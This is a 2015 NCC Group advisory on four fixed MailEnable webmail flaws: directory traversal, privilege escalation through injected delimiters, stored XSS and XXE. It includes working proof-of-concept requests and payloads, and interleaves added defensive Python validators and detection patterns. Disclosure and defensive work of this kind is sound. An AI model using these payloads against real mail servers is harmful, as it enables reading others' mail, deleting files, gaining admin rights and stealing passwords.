2015-03-10

https://www.nccgroup.com/research/
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Summary
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Title Multiple Vulnerabilities in MailEnable
Release Date 10 March 2015
Reference NCC00777, NCC00778, NCC00779, NCC00780
Discoverer Soroush Dalili (@irsdl)
Vendor MailEnable
Vendor Reference http://www.mailenable.com/
Systems Affected Tested on version 8.56 (versions prior to 8.60, 7.60, 6.88, and 5.62 should be vulnerable)
CVE Reference TBC
Risk High
Status Fixed
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Resolution Timeline
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Discovered 29 December 2014
Reported 03 February 2015
Fixed 26 February 2015
Published 10 March 2015
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Vulnerability Brief Description
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The following vulnerabilities were identified in the MailEnable application:
1) Directory Traversal
2) Privilege Escalation
3) Stored XSS
4) XXE
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
1) Directory Traversal - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
In several places the MailEnable web application performed no directory traversal checks at all.
Where a check did exist, it could be bypassed by using the "/.. /" pattern (a space character
after the second dot) instead of the usual "/../" pattern.
As a result it was possible to:
- Share other users' folders to read their messages
- Read other users' messages
- Upload files in other directories by using directory traversal in the File Upload module
- Delete any files from the server by using the send email functionality
** Example 1: Sharing other users' folders to read their messages
PoC (ID and Folder parameters were affected):
The following request shared another user's INBOX:
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=GRANTACCESS&Browser=2&Folder=%2F../anotherUser/Inbox&ME_ACE=EVERYONE&ME_MAILBOX_NAME=&ME_ACCESS=FULL&DT=1419288553278
The following request was sent to use this shared folder and enable access to another
user's emails:
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=ADDCONNECTION&Browser=2&Mailbox=anotherUser&Folder=%2FInbox&DT=1419289069638
** Example 2: Reading other users' messages
PoC (ID and Folder parameters were affected - "+" sign was used to encode the space
characters):
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=GETMESSAGE&Browser=2&Folder=/X/..+/..+/anotherUser/&ID=./Inbox/DEFAULT.MAI&BODY=0&DT=1419293886037
** Example 3: Uploading files in other directories by using directory traversal in the File Upload module
PoC (Folder parameter was affected):
POST /MEWebMail/Mondo/lang/sys/Forms/FLS/list.aspx?TS=1419286047604&Folder=%24FILEROOT%2f/../../../../../ HTTP/1.1
Host: example.com
Cookie: [VALID_COOKIES_HERE]
Content-Type: multipart/form-data; boundary=---------------------------12571835021337
Content-Length: [VALID_LENGTH]
-----------------------------12571835021337
Content-Disposition: form-data; name="__VIEWSTATE"
[VALID_VIEWSTATE_HERE]
-----------------------------12571835021337
Content-Disposition: form-data; name="__VIEWSTATEGENERATOR"
[VALID_VIEWSTATEGENERATOR_HERE]
-----------------------------12571835021337
Content-Disposition: form-data; name="ME_SID"
[VALID_ME_SID_HERE]
-----------------------------12571835021337
Content-Disposition: form-data; name="uscFileUpload$FileUploader"; filename="testfile.aspx"
Content-Type: application/octet-stream
[data here]
-----------------------------12571835021337--
** Example 4: Deleting arbitrary files from the server by using the send email functionality
PoC (ID and Folder parameters were affected - "+" sign was used to encode the space
characters):
POST /MEWebMail/Mondo/Servlet/request.aspx HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
MailEnable-SessionId: [VALID_SESSIONID_HERE]
Content-Length: [VALID_LENGTH]
Cookie: [VALID_COOKIES_HERE]
Cmd=SENDMESSAGE&ID=xxx\..+\..+\xxxxxxxxx&Folder=%5cDraftsxxxx&MsgBody=test&HTMLFormat=1&FromRecipients=%5BDEFAULT%5D&ToRecipients=user%40test.com&CCRecipients=&BCCRecipients=&Subject=test&Priority=3&Notify=false&PostOffice=DEFAULT&Mailbox=testuser&SessionKey=0e7a00032f33230f7c65092c540e690620&IdentityID=[DEFAULT]&CS=Send
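The check below is an added example (not MailEnable's code) of how a Folder/ID parameter can be validated so that the "/.. /" spacing bypass, the backslash variant from Example 4 and the "$FILEROOT" prefix from Example 3 are all refused; the allowed segment characters are an assumption, since the advisory does not state MailEnable's folder naming rules. It also includes a pattern for spotting such requests in web server logs.

```python
"""Folder/ID parameter check that closes the "/.. /" (dot-dot-space) bypass
described above.  Added example, not MailEnable's code."""
import re
from urllib.parse import unquote_plus

# Characters assumed acceptable in a folder segment (an assumption for this
# example; the advisory does not state MailEnable's own naming rules).
_SAFE_SEGMENT = re.compile(r"^[A-Za-z0-9 ._-]+$")
# Detection pattern for log review: ".." between separators, tolerating the
# whitespace that defeated the original check; run on the decoded value.
_DOTDOT = re.compile(r"(?:^|[\\/])\s*\.\.\s*(?:[\\/]|$)")

def canonical_folder(param: str) -> str:
    """Return a safe, mailbox-relative path or raise ValueError.

    `param` is the value as the web framework already decoded it; it is
    decoded once more so a second layer of %-encoding cannot hide a slash.
    """
    decoded = unquote_plus(param)
    if "\x00" in decoded:
        raise ValueError("NUL byte in folder path")
    parts = []
    for seg in re.split(r"[\\/]+", decoded):    # "\" and "/" both separate
        seg = seg.strip()                        # ".. " -> ".." BEFORE testing
        if not seg:
            continue                             # leading/trailing/double separator
        if not seg.strip(". ") or seg.endswith("."):
            raise ValueError(f"dot-only or dot-terminated segment: {seg!r}")
        if not _SAFE_SEGMENT.match(seg):
            raise ValueError(f"disallowed characters in segment: {seg!r}")
        parts.append(seg)
    if not parts:
        raise ValueError("empty folder path")
    return "/".join(parts)

def is_safe_folder(param: str) -> bool:
    """Boolean form of canonical_folder for call sites that only gate."""
    try:
        canonical_folder(param)
    except ValueError:
        return False
    return True

def looks_like_traversal(param: str) -> bool:
    """Log-review helper: does a request parameter carry a traversal
    sequence, including the "/.. /" and "\\.. \\" spacing variants?"""
    return _DOTDOT.search(unquote_plus(param)) is not None
```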
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
2) Privilege Escalation - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
As the username, password, and user-role parameters were stored in a plain-text file
("AUTH.TAB") without any encoding, it was possible to change the user's user-role (or add a
new user) by using a crafted password.
As an example, after changing the password to "Password12%09DEFAULT%09SYSADMIN%09%0A" (by
using a web proxy) in a change password request, the "AUTH.TAB" file was changed as follows
(delimiter was a TAB character):
testuser@DEFAULT 1 Password12 DEFAULT SYSADMIN
DEFAULT USER
Now, "testuser" could log in as an admin user (to reset other users' passwords as an example).
This was possible via the mobile version of the admin section ("/MEAdmin/Mobile/") even when
the admin panel was disabled.
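The following added example (not MailEnable's code) reproduces the delimiter injection against a TAB/newline-delimited store with the crafted password from this section, and shows a writer that cannot be driven that way; the column order is inferred from the AUTH.TAB sample above and is an assumption.

```python
"""Delimiter-injection check for a TAB/newline-delimited credential store
like the AUTH.TAB file above.  Added example, not MailEnable's code; the
column order is inferred from the advisory's sample line (an assumption)."""
import hashlib
import os

FIELDS = ("account", "flag", "password", "postoffice", "role")
KNOWN_ROLES = ("USER", "ADMIN", "SYSADMIN")        # roles the advisory shows
# Decoded form of the PoC password "Password12%09DEFAULT%09SYSADMIN%09%0A".
CRAFTED_PASSWORD = "Password12\tDEFAULT\tSYSADMIN\t\n"

def naive_record(mailbox, postoffice, password, role="USER"):
    """The vulnerable pattern: a client-supplied string is interpolated
    straight into a line whose own delimiters are TAB and LF."""
    return f"{mailbox}@{postoffice}\t1\t{password}\t{postoffice}\t{role}\n"

def parse_auth_tab(text):
    """Read the store the way a line- and TAB-oriented reader would."""
    return [dict(zip(FIELDS, line.split("\t")))
            for line in text.split("\n") if line]

def safe_record(mailbox, postoffice, password, role="USER"):
    """Hardened writer: the role comes from server-side policy, every text
    field is refused if it carries a control character (so 0x09/0x0A can
    never split or add a record), and the password is stored as a salted
    hash whose hex encoding cannot contain a delimiter at all."""
    if role not in KNOWN_ROLES:
        raise ValueError("unknown role")
    for name, value in (("mailbox", mailbox), ("postoffice", postoffice),
                        ("password", password)):
        if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in value):
            raise ValueError(f"control character in {name}")
        if name != "password" and "@" in value:
            raise ValueError(f"account delimiter '@' in {name}")
    salt = os.urandom(16)
    digest = hashlib.pbkdf2_hmac("sha256", password.encode("utf-8"), salt, 200_000)
    stored = f"pbkdf2-sha256${salt.hex()}${digest.hex()}"
    return f"{mailbox}@{postoffice}\t1\t{stored}\t{postoffice}\t{role}\n"
```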
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
3) Stored XSS - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
The anti-XSS protection of emails in the MailEnable application was bypassed when an HTML tag
was not closed properly. As a result, it was possible to send an email containing JavaScript
code which would be executed as soon as a victim user viewed the message. An attacker could
set permanent rules for redirecting emails, hijack other emails' contents, share users'
folders, or exploit other vulnerabilities within the MailEnable application to gain admin
access to the application.
PoC ("+" sign was used to encode the space characters):
1337+Message+Body<img/src=x+onerror=alert('XSS-HERE!')+
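As an added illustration (not MailEnable's filter, which the advisory does not show), the snippet below contrasts a tag-stripper that only recognises a tag once it sees ">" with one that, like a browser's tokenizer, also closes a tag at end of input; a production webmail should use an allow-list HTML sanitiser built on a real parser, and the regexes here only isolate the failure mode.

```python
"""Why a "match <...> and strip it" filter misses the unclosed <img ...>
payload above, and a variant that treats end-of-input as the tag's close
the way browsers do.  Added example; neither function is MailEnable's
filter (the advisory does not show that code)."""
import html
import re

# Constructed copy of the PoC after the server has decoded "+" to spaces.
POC_BODY = "1337 Message Body<img/src=x onerror=alert('XSS-HERE!') "

_COMPLETE_TAG = re.compile(r"<[^>]*>")
# A tag opens at "<" followed by a letter, "/", "!" or "?".  The browser's
# tokenizer closes it at the next ">" OR at end of input, so match both.
_TAG_OR_TAIL = re.compile(r"<[A-Za-z/!?][^>]*(?:>|$)")

def strip_tags_naive(body: str) -> str:
    """Flawed: only a tag with a terminating '>' is recognised."""
    return _COMPLETE_TAG.sub("", body)

def strip_tags_hardened(body: str) -> str:
    """Drop tags whether or not they are terminated, then escape any stray
    angle brackets so the browser can only render them as text."""
    return html.escape(_TAG_OR_TAIL.sub("", body), quote=False)

def contains_event_handler(rendered: str) -> bool:
    """Post-sanitisation check: is an on*= attribute still present?"""
    return re.search(r"\bon[a-z]+\s*=", rendered, re.IGNORECASE) is not None
```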
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
4) XXE - Description & Technical Details
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
There was an XXE vulnerability within the email settings by using the "Options" parameter
which accepted an XML message. As a result, it was possible to read local files or scan the
internal network. As the plain-text email passwords were stored in the "AUTH.TAB" file, it was
possible to read the passwords.
PoC:
The following request was sent to read the first line of the "AUTH.TAB" file
(with Postmaster's password) by using the Background Image URL parameter:
/MEWebMail/Mondo/Servlet/request.aspx?Cmd=SET-MBXOPTIONS&Browser=2&Options=<%3fxml+version%3d"1.0"+encoding%3d"ISO-8859-1"%3f><!DOCTYPE+options+[+<!ELEMENT+options+ANY+>+<!ENTITY+xxe+SYSTEM+"file%3a///C:\Program+Files\Mail+Enable\Config\AUTH.TAB"+>]><options><option><name><![CDATA[WebMailWatermarkURL]]></name><value>%26xxe;</value></option></options>&DT=1419127432547
After this request was sent, the Postmaster's password appeared in the HTML response of every page, as shown below:
...
<style type="text/css">
.custBg_img
{background:url(/MEWebMail/Mondo/skins/Pacific/"Postmaster@DEFAULT 1 Password1 DEFAULT ADMIN) no-repeat;background-position:left bottom;background-repeat:no-repeat;}
.custBg_opacity {opacity:0.2;filter:Alpha(opacity=20);-msfilter:"Alpha(Opacity=20)";}
</style>
...
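The parser below is an added example (not MailEnable's code) of how the Options XML can be consumed without exposing the file system: it uses the standard library's expat binding and aborts on any DOCTYPE, which is the only place an entity such as the one above can be declared. The decoded copy of the advisory's payload is embedded only as test input.

```python
"""Hardened parser for the <options> XML that the Options parameter above
accepts.  Added example, not MailEnable's code: it rejects any DOCTYPE,
which is where entity declarations live, so an external entity can never
pull AUTH.TAB (or anything else) into a response."""
import xml.parsers.expat

# Constructed, URL-decoded copy of the advisory's payload, used as test input.
XXE_PAYLOAD = (
    '<?xml version="1.0" encoding="ISO-8859-1"?>'
    '<!DOCTYPE options [ <!ELEMENT options ANY > <!ENTITY xxe SYSTEM '
    '"file:///C:\\Program Files\\Mail Enable\\Config\\AUTH.TAB" >]>'
    '<options><option><name><![CDATA[WebMailWatermarkURL]]></name>'
    '<value>&xxe;</value></option></options>'
)

class UnsafeXml(ValueError):
    pass

def parse_options(xml_text: str) -> dict:
    """Return {name: value} from <options><option><name/><value/></option></options>.
    Raises UnsafeXml on a DOCTYPE or external entity reference; malformed
    input raises xml.parsers.expat.ExpatError as usual."""
    parser = xml.parsers.expat.ParserCreate()
    options, path, buf, current = {}, [], [], {}
    def reject_doctype(name, sysid, pubid, has_internal_subset):
        raise UnsafeXml("DOCTYPE not allowed in option payloads")
    def reject_external(context, base, sysid, pubid):
        raise UnsafeXml("external entity reference rejected")

    def start(tag, attrs):
        path.append(tag)
        buf.clear()

    def end(tag):
        text = "".join(buf).strip()
        if tag in ("name", "value") and path[-2:-1] == ["option"]:
            current[tag] = text
        elif tag == "option" and "name" in current:
            options[current["name"]] = current.get("value", "")
            current.clear()
        path.pop()
        buf.clear()

    parser.StartDoctypeDeclHandler = reject_doctype   # fires before any <!ENTITY>
    parser.ExternalEntityRefHandler = reject_external
    parser.StartElementHandler = start
    parser.EndElementHandler = end
    parser.CharacterDataHandler = buf.append          # CDATA arrives here too
    parser.Parse(xml_text, True)
    return options
```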
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Fix Information
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Upgrade to the latest version. Fixed versions are as follows:
Version 8.60 (the current version)
Version 7.60
Version 6.88
Version 5.62
Release notes are as follows:
http://www.mailenable.com/Standard-ReleaseNotes.txt
http://www.mailenable.com/Professional-ReleaseNotes.txt
http://www.mailenable.com/Enterprise-ReleaseNotes.txt
http://www.mailenable.com/Premium-ReleaseNotes.txt
https://www.mailenable.com/Premium-ReleaseNotes5.txt
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
NCC Group
~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.~.
Research https://www.nccgroup.com/research
Twitter https://www.twitter.com/NCCGroupInfoSec / @NCCGroupInfoSec
Open Source https://github.com/nccgroup
Blog https://www.nccgroup.com/en/blog/cyber-security/
SlideShare http://www.slideshare.net/NCC_Group/
